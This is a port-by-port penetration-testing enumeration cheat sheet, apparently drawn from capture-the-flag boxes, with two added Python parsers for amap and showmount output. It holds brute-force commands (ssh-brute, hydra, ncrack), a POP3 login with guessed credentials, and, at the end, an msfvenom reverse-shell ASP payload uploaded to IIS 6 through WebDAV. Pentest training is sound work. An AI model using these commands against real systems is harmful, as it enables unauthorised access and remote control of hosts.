Below is the process to follow, based on the situation that presents itself during a pentest.

Before assuming that a port is only listening for one service, use amap to check whether multiple services are running on the same port.

amap 12380

Protocol on matches http
Protocol on matches http-apache2
Protocol on matches ntp
Protocol on matches ssl

As we can see, on port 12380 HTTP, NTP and SSL are all running! We wouldn't have known this otherwise.

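Added example (not from the original post): a small Python parser for amap's per-port summary lines that groups the protocol matches per socket and reports ports answering for more than one protocol family, which is the situation shown above. The sample output is constructed, and the 192.0.2.x host is a placeholder.

```python
import re
from collections import defaultdict

# Constructed sample of amap summary output ("Protocol on <host>:<port>/<proto> matches <name>");
# the host and ports are made up for this example.
SAMPLE_AMAP_OUTPUT = """\
Protocol on 192.0.2.10:12380/tcp matches http
Protocol on 192.0.2.10:12380/tcp matches http-apache2
Protocol on 192.0.2.10:12380/tcp matches ntp
Protocol on 192.0.2.10:12380/tcp matches ssl
Protocol on 192.0.2.10:22/tcp matches ssh
"""

# Greedy host match so an IPv6 literal with colons still splits at the last ':port'.
LINE_RE = re.compile(r"^Protocol on (.+):(\d+)/(tcp|udp) matches (\S+)$")


def parse_amap(text):
    """Return {(host, port, proto): [protocol names in order seen]}."""
    matches = defaultdict(list)
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # ignore banners, progress lines and anything else amap prints
        host, port, proto, name = m.groups()
        key = (host, int(port), proto)
        if name not in matches[key]:
            matches[key].append(name)
    return dict(matches)


def multi_protocol_ports(text):
    """Sockets where amap saw more than one protocol family.

    Variants of one family (http, http-apache2) are counted once, so a plain
    web server is not reported; a port that talks http AND ntp AND ssl is.
    """
    result = {}
    for key, names in parse_amap(text).items():
        families = {n.split("-")[0] for n in names}
        if len(families) > 1:
            result[key] = sorted(families)
    return result
```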
TCP Port 21
nmap -sV -sC -p 21
Banner grab - (nmap -v -p 21 -sV x.x.x.x --script=banner)

Try logging in anonymously
lftp anonymous@IP
No Password (hit Enter)

nmap --script=ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-anon,ftp-libopie,ftp-vuln-cve2010-4221,tftp-enum -p 21 -n -v -sV -Pn

TCP Port 22
How to use a different key exchange?

nmap -p 22 -n -v -sV -Pn --script ssh-auth-methods --script-args ssh.user=root
nmap -p 22 -n -v -sV -Pn --script ssh-hostkey 
nmap -p 22 -n -v -sV -Pn --script ssh-brute --script-args userdb=user_list.txt,passdb=password_list.txt 


TCP Port 23

TCP Port 25
SMTP user enumeration

Check for username enumeration

smtp-user-enum -M VRFY -U /usr/share/wordlists/Seclists/Usernames/Names/names.txt -t

Test if VRFY is allowed:

telnet 25
Connected to
Escape character is '^]'.
501 HELO Invalid domain address.
250 Hello.
VRFY root
502 VRFY disallowed.
VRFY blah
502 VRFY disallowed.

================================================= TCP Port 53 - DNS Related testing... (WHEN OPEN THIS IS USUALLY TO FACILITATE ZONE TRANSFERS)

TCP port 53 is unusual because we normally see this on UDP 53.

> SERVER 'IP' - this command connects us to the name server initially.

> - let's see what we get from localhost

> 'IP' try the IP of the box you are testing
> '' any host name that seems logical for the box and might help.

dnsrecon -r -n 'IP' IP can be or whatever you are testing

also try..
dnsrecon -r -n 'IP'

next try..
dnsrecon -r '' -n - This time we look at the entire /24. You can also try /16 and /8 as needed.

next try with dig and add the DNS server address..
dig axfr @ (where is the DNS Server address)

next try
dig axfr @

dig axfr @

================================================== TCP PORT 79 - FINGER (which users have logged in or are logged in to the system)

1) Download

1.1) perl -U /usr/share/wordlists/SecLists/Usernames/Names/names.txt -t | less -S

Getting the results can take AGES! Be PATIENT!
Also, while waiting, you can run multiple instances, so create a user.txt file and add names that could be relevant based on other enumeration.

1.2) Once we have results we are looking for "pts/2" or "pts/3" (the terminal they logged into), plus the time and the address. This tells us that these names exist and are either currently logged in or have logged in recently.

================================================== TCP Port 80 (or any HTTP listening service)
nmap -sC -sV -A -p 80 ip
Run dirbuster first as this seems to give better performance.
dirsearch - test with "-f"; this can change the outcome of directories from 302s to 200s. Not sure why, but try it!

If all responses return '200 OK' then switch to wfuzz. Go to the Wfuzz page.

If there is a /cgi-bin/ folder then search for .sh and .py files!

Add a logical name into the 'hosts' file and re-check the site.
Check for WebDAV - nmap -T4 -p80 --script=http-iis-webdav-vuln
If it exists, run davtest - davtest -url
then cadaver - cadaver

If the site has extensions like (.php) then add the extension option in dirsearch "-e" or dirb "-X"

Test For HTTP PUT Method - curl -X OPTIONS http://IP:PORT -v

If PUT is available:
Upload a file - curl -i -X PUT -H "Content-Type: application/xml; charset=utf-8" -d @"/directory/to/file" http://IP:Port 
Read the source code? --> Any comments? --> Any hint to a WordPress or Joomla Site?

If Joomla - run JScan
If WordPress - WPSCAN --> Goto Wordpress Section

If the webpage doesn't end with an extension (e.g. http://test/index) then try php filters.

Got a login portal? Goto WEB LOGIN

TCP Port 110 - POP3 - Read Email with LIST Command
# Try to brute force POP3 usernames
nmap -sV --script=pop3-brute

110/tcp open  pop3    JAMES pop3d 2.3.2
| pop3-brute:
|   Accounts: No valid accounts found
|   Statistics: Performed 19457 guesses in 404 seconds, average tps: 47.2

|_  ERROR: Failed to connect.

root@kali:~# telnet 110
Connected to
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
USER john
PASS john
+OK Welcome john
+OK 1 743
1 743
retr 1
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <9564574.1.1503422198108.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: john@localhost
Received: from ([])
          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
          for <john@localhost>;
          Tue, 22 Aug 2017 13:16:20 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:16:20 -0400 (EDT)
From: mailadmin@localhost
Subject: New Hires access

Can you please restrict mindy's access until she gets read on to the program. Also make sure that you send her a tempory password to login to her accounts.

Thank you in advance.



TCP Port 111 - RPCBind
apt install nfs-common

  1. rpcinfo -p | grep nfs
  2. showmount -e
  3. If we get an output like..
  4. Export list for
    /home/vulnix *
  5. The * indicates that any IP is allowed to connect.
  6. mount -t nfs /home/vulnix/ /mnt/whatever -o nolock
  7. If we get "Permission denied" then this could be "root squashing", which basically means we can't access it.
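
Added example (not from the original post): a Python audit helper that parses `showmount -e` output and flags the exports open to any client, i.e. the `*` case described in step 5. The export list below is constructed; it assumes the Linux `*` form and the `(everyone)` form some servers print both mean "any client".

```python
# Constructed sample of `showmount -e <server>` output; the server, paths and
# client specs are made up for this example.
SAMPLE_SHOWMOUNT = """\
Export list for 192.0.2.20:
/home/vulnix *
/srv/backup  192.0.2.0/24,192.0.2.5
/srv/public  (everyone)
"""

# Assumption: either spelling means the export is not restricted to any client.
ANY_CLIENT = ("*", "(everyone)")


def parse_export_list(text):
    """Return [(path, [client specs])] from showmount -e output.

    The first line is the 'Export list for <server>:' header; every other
    non-empty line is '<path> <client>[,<client>...]'.
    """
    exports = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("Export list for"):
            continue
        parts = line.split(None, 1)
        path = parts[0]
        clients = [c.strip() for c in parts[1].split(",")] if len(parts) > 1 else []
        exports.append((path, clients))
    return exports


def open_exports(text):
    """Paths that any host may mount: the finding worth reporting to the owner."""
    return [path for path, clients in parse_export_list(text)
            if any(c in ANY_CLIENT for c in clients)]
```

An export restricted to a subnet or a list of hosts (like /srv/backup above) is not reported, even though it may still deserve a look at the server's squash settings.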
TCP Port 135 Remote Procedure Call
nbtstat -a

TCP Port 137

TCP Port 139

TCP Port 161

nmap -n -vv -sV -sU -Pn -p 161,162 --script=snmp-processes,snmp-netstat
onesixtyone -c communities.txt
snmp-check -t -c public
snmpwalk -c public -v 1 [MIB_TREE_VALUE]
hydra -P passwords.txt -v snmp


# SNMP MIB trees worth walking: System Processes, Running Programs, Processes Path, Storage Units, Software Name, User Accounts, TCP Local Ports
TCP Port 162

TCP Port 443

TCP Port 445
apt-get install smb4k -y
nmap -n -v -sV -Pn -p 445 --script=smb-ls,smb-mbenum,smb-enum-shares,smb-enum-users,smb-os-discovery,smb-security-mode,smbv2-enabled,smb-vuln*
enum4linux -a
rpcclient -U ""
smbclient -L
smbclient \\\ipc$ -U administrator
smbclient //$ -U administrator
smbclient //$ -U administrator

TCP Ports 512,513,514
apt-get install rsh-client

# Try to log in with the root user or a user found already.
rlogin -l root

# If not, try to brute force - output is slow but will come.
nmap -p 513 --script rlogin-brute -v 

TCP Port 3306

nmap -n -v -sV -Pn -p 3306 --script=mysql-info,mysql-audit,mysql-enum,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-users,mysql-query,mysql-variables,mysql-vuln-cve2012-2122
mysql --host= -u root -p

TCP Port 3389

ncrack -vv --user administrator -P passwords.txt rdp://,CL=1


IIS6.0 Server 2003 ASP File Upload
msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=4444 -f asp --arch x86 --platform windows > shell_reverse_tcp.asp

dav:/> put shell_reverse_tcp.txt
Uploading shell_reverse_tcp.txt to `/shell_reverse_tcp.txt':
Progress: [=============================>] 100.0% of 38349 bytes succeeded.
dav:/> copy shell_reverse_tcp.txt shell_reverse_tcp.asp;.txt
Copying `/shell_reverse_tcp.txt' to `/shell_reverse_tcp.asp%3b.txt':  succeeded.

Image Files

exiftool -a -u -g1 FILENAME
binwalk -ME FILENAME

Using PUT to create a shell on IIS 6 - create the payload, upload it with a .txt name, and from there copy it to .asp;.txt

Opening Database Files
-SDF files can be opened with SQL Query Compact Analyser;
-MDF files can be opened with SQL MDF Viewer

Found an LFI, or want to test for LFI? Use LFISuite.
